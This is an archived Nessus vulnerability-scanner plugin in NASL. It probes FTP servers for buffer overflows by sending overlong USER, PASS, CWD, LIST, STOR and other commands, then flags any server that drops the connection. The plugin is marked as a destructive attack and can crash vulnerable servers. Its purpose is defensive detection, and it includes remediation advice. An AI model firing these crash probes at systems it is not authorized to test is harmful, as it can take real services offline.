home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / ftp_overflow.nasl

< prev

next >

Wrap

Text File  |  2005-01-14  |  8KB  |  305 lines

---

1. #
2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
3. #
4. # See the Nessus Scripts License for details
5. #
6. # Also covers:
7. # CAN-2002-0126
8. # CVE-2000-0870
9. # ezserver FTP overflow (tested -> crashes by sending a too long username)
10. #
11. # References:
12. # From: support@securiteam.com
13. # Subject: [NT] Hyperion FTP Server Buffer Overflow (dir)
14. # To: list@securiteam.com
15. # Date: 25 Dec 2002 11:08:39 +0200
16. #
17. # From: support@securiteam.com
18. # Subject: [NT] Multiple Vulnerabilities in Enceladus Server (cd, dir, mget)
19. # To: list@securiteam.com
20. # Date: 25 Dec 2002 11:03:42 +0200
21. #
22. # From:    "Carsten H. Eiram" <che@secunia.com>
23. # To: "Full Disclosure" <full-disclosure@lists.netsys.com>,
24. #    "VulnWatch" <vulnwatch@vulnwatch.org> 
25. # Date:    26 Jun 2003 17:00:57 +0200
26. # Subject: Secunia Research: FTPServer/X Response Buffer Overflow Vulnerability
27. # 
28. # From: support@securiteam.com
29. # Subject: [UNIX] ProFTPD Long Password Crash
30. # To: list@securiteam.com
31. # Date: 25 Dec 2002 11:49:22 +0200
32. #
33.  
34. if(description)
35. {
36.  script_id(10084);
37.  script_bugtraq_id(1227, 1675, 1690, 1858, 3884, 7251, 7278, 7307, 961);
38.  script_version ("$Revision: 1.50 $");
39.  script_cve_id("CAN-2000-0133", "CVE-2000-0943", "CAN-2002-0126", "CVE-2000-0870", "CAN-2000-1035", "CAN-2000-1194", "CAN-2000-1035");
40.  
41.  name["english"] = "ftp USER, PASS or HELP overflow";
42.  name["francais"] = "dΘpassement de buffer avec les commandes USER, PASS ou HELP";
43.  script_name(english:name["english"], francais:name["francais"]);
44.  
45.  desc["english"] = "The remote FTP server closes
46. the connection when a command is too long or is given
47. a too long argument. 
48.  
49. This probably due to a buffer overflow, which
50. allows anyone to execute arbitrary code
51. on the remote host.
52.  
53. This problem is threatening, because
54. the attackers don't need an account 
55. to exploit this flaw.
56.  
57. Solution : Upgrade your FTP server or change it
58. Risk factor : High";
59.  
60.  
61.  desc["francais"] = "Le server FTP distant coupe
62. la connection lorsque l'une des commandes est accompagnΘe 
63. d'un argument trop long.
64.  
65. C'est probablement du α un dΘpassement de
66. buffer, ce qui permet α n'importe qui
67. d'executer du code arbitraire sur cette
68. machine.
69.  
70. Ce problΦme est grave, car les pirates
71. n'ont pas besoin d'avoir un accompte
72. sur le serveur FTP pour exploiter ce
73. probleme.
74.  
75. Solution : Mettez α jour votre serveur FTP
76. ou changez-le
77. Facteur de risque : ElevΘ";
78.  
79.  
80.  script_description(english:desc["english"], francais:desc["francais"]);
81.  
82.  summary["english"] = "attempts some buffer overflows";
83.  summary["francais"] = "essaye des buffers overflows";
84.  script_summary(english:summary["english"], francais:summary["francais"]);
85.  
86.  script_category(ACT_DESTRUCTIVE_ATTACK);
87.  
88.  
89.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
90.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
91.  family["english"] = "FTP";
92.  family["francais"] = "FTP";
93.  script_family(english:family["english"], francais:family["francais"]);
94.  script_dependencie("find_service.nes", "ftpserver_detect_type_nd_version.nasl");
95.  script_exclude_keys("ftp/msftpd", "ftp/ncftpd", "ftp/fw1ftpd", "ftp/vxftpd");
96.  script_require_ports("Services/ftp", 21);
97.  exit(0);
98. }
99.  
100. #
101. # The script code starts here
102. #
103.  
104. include("ftp_func.inc");
105.  
106. port = get_kb_item("Services/ftp");
107. if(!port)port = 21;
108.  
109.  
110.  
111. if(get_port_state(port))
112. {
113.  soc = open_sock_tcp(port);
114.  if(soc)
115.  {
116.   d = ftp_recv_line(socket:soc);
117.   if(!d){
118.     set_kb_item(name:"ftp/false_ftp", value:TRUE);
119.     close(soc);
120.     exit(0);
121.     }
122.   if(!ereg(pattern:"^220[ -]", string:d))
123.    {
124.     # not a FTP server
125.     set_kb_item(name:"ftp/false_ftp", value:TRUE);
126.     close(soc);
127.     exit(0);    
128.    }
129.  
130.   if("Microsoft FTP Service" >< d)exit(0);
131.  
132.   req = string("USER ftp\r\n");
133.   send(socket:soc, data:req);
134.   d = ftp_recv_line(socket:soc);
135.   ftp_close(socket:soc);
136.   if(!d)
137.   {
138.    set_kb_item(name:"ftp/false_ftp", value:TRUE);
139.    exit(0);    
140.   }
141.   
142.   soc = open_sock_tcp(port);
143.   d = ftp_recv_line(socket:soc);
144.   s = string("USER ", crap(4096), "\r\n");
145.   send(socket:soc, data:s);
146.   d = ftp_recv_line(socket:soc);
147.   if(!d){
148.       set_kb_item(name:"ftp/overflow", value:TRUE);
149.     set_kb_item(name:"ftp/overflow_method", value:"USER");
150.     security_hole(port);
151.     }
152.   else
153.   {
154.    s = string("USER nessus\r\n");
155.    send(socket:soc, data:s);
156.    d = ftp_recv_line(socket:soc);
157.    # ProFTPD 1.5.2 crashes with more than 12 KB
158.    s = string("PASS ", crap(12500), "\r\n");
159.    send(socket:soc, data:s);
160.    d = ftp_recv_line(socket:soc);
161.    if(!d){
162.       set_kb_item(name:"ftp/overflow", value:TRUE);
163.     set_kb_item(name:"ftp/overflow_method", value:"PASS");
164.     security_hole(port);
165.     }
166.    else
167.    {
168.      s = string("CWD ", crap(4096), "\r\n");
169.      send(socket:soc, data:s);
170.      d = ftp_recv_line(socket:soc);
171.      if(!d){
172.       set_kb_item(name:"ftp/overflow", value:TRUE);
173.     set_kb_item(name:"ftp/overflow_method", value:"CWD");
174.     security_hole(port);
175.     exit(0);
176.     }
177.     
178.      s = string("LIST ", crap(4096), "\r\n");
179.      send(socket:soc, data:s);
180.      d = ftp_recv_line(socket:soc);
181.      if(!d){
182.       set_kb_item(name:"ftp/overflow", value:TRUE);
183.     set_kb_item(name:"ftp/overflow_method", value:"LIST");
184.     security_hole(port);
185.     exit(0);
186.     }
187.     
188.         
189.      s = string("STOR ", crap(4096), "\r\n");
190.      send(socket:soc, data:s);
191.      d = ftp_recv_line(socket:soc);
192.      if(!d){
193.       set_kb_item(name:"ftp/overflow", value:TRUE);
194.     set_kb_item(name:"ftp/overflow_method", value:"STOR");
195.     security_hole(port);
196.     exit(0);
197.     }
198.     
199.      s = string("RNTO ", crap(4096), "\r\n");
200.      send(socket:soc, data:s);
201.      d = ftp_recv_line(socket:soc);
202.      if(!d){
203.       set_kb_item(name:"ftp/overflow", value:TRUE);
204.     set_kb_item(name:"ftp/overflow_method", value:"RNTO");
205.     security_hole(port);
206.     exit(0);
207.     }
208.     
209.      s = string("MKD ", crap(4096), "\r\n");
210.      send(socket:soc, data:s);
211.      d = ftp_recv_line(socket:soc);
212.      if(!d){
213.       set_kb_item(name:"ftp/overflow", value:TRUE);
214.     set_kb_item(name:"ftp/overflow_method", value:"MKD");
215.     security_hole(port);
216.     exit(0);
217.     }    
218.         
219.      s = string("XMKD ", crap(4096), "\r\n");
220.      send(socket:soc, data:s);
221.      d = ftp_recv_line(socket:soc);
222.      if(!d){
223.       set_kb_item(name:"ftp/overflow", value:TRUE);
224.     set_kb_item(name:"ftp/overflow_method", value:"XMKD");
225.     security_hole(port);
226.     exit(0);
227.     }
228.     
229.      s = string("RMD ", crap(4096), "\r\n");
230.      send(socket:soc, data:s);
231.      d = ftp_recv_line(socket:soc);
232.      if(!d){
233.       set_kb_item(name:"ftp/overflow", value:TRUE);
234.     set_kb_item(name:"ftp/overflow_method", value:"RMD");
235.     security_hole(port);
236.     exit(0);
237.     }    
238.  
239.  
240.      s = string("XRMD ", crap(4096), "\r\n");
241.      send(socket:soc, data:s);
242.      d = ftp_recv_line(socket:soc);
243.      if(!d){
244.       set_kb_item(name:"ftp/overflow", value:TRUE);
245.     set_kb_item(name:"ftp/overflow_method", value:"XRMD");
246.     security_hole(port);
247.     exit(0);
248.     }    
249.     
250.      s = string("APPE ", crap(4096), "\r\n");
251.      send(socket:soc, data:s);
252.      d = ftp_recv_line(socket:soc);
253.      if(!d){
254.       set_kb_item(name:"ftp/overflow", value:TRUE);
255.     set_kb_item(name:"ftp/overflow_method", value:"APPE");
256.     security_hole(port);
257.     exit(0);
258.     }
259.     
260.      s = string("SIZE ", crap(4096), "\r\n");
261.      send(socket:soc, data:s);
262.      d = ftp_recv_line(socket:soc);
263.      if(!d){
264.       set_kb_item(name:"ftp/overflow", value:TRUE);
265.     set_kb_item(name:"ftp/overflow_method", value:"SIZE");
266.     security_hole(port);
267.     exit(0);
268.     }
269.     
270.      s = string("RNFR ", crap(4096), "\r\n");
271.      send(socket:soc, data:s);
272.      d = ftp_recv_line(socket:soc);
273.      if(!d){
274.       set_kb_item(name:"ftp/overflow", value:TRUE);
275.     set_kb_item(name:"ftp/overflow_method", value:"RNFR");
276.     security_hole(port);
277.     exit(0);
278.     }
279.     
280.                 
281.      s = string("HELP ", crap(4096), "\r\n");
282.      send(socket:soc, data:s);
283.      d = ftp_recv_line(socket:soc);
284.      if(!d){
285.       set_kb_item(name:"ftp/overflow", value:TRUE);
286.     set_kb_item(name:"ftp/overflow_method", value:"HELP");
287.     security_hole(port);
288.     exit(0);
289.     }
290.  
291.      s = string(crap(4096), "\r\n");
292.      send(socket:soc, data:s);
293.      d = ftp_recv_line(socket:soc);
294.      if(!d){
295.       set_kb_item(name:"ftp/overflow", value:TRUE);
296.     set_kb_item(name:"ftp/overflow_method", value:"");
297.     security_hole(port);
298.     exit(0);
299.     }
300.      }
301.     }
302.    close(soc);
303.   }
304.  }
305.